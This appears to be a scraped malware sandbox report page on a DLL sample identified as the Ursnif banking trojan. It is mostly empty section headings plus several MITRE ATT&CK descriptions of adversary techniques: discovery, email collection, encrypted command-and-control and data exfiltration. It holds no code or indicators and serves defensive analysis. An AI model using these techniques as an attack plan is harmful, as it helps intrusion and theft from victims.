Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 2200.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre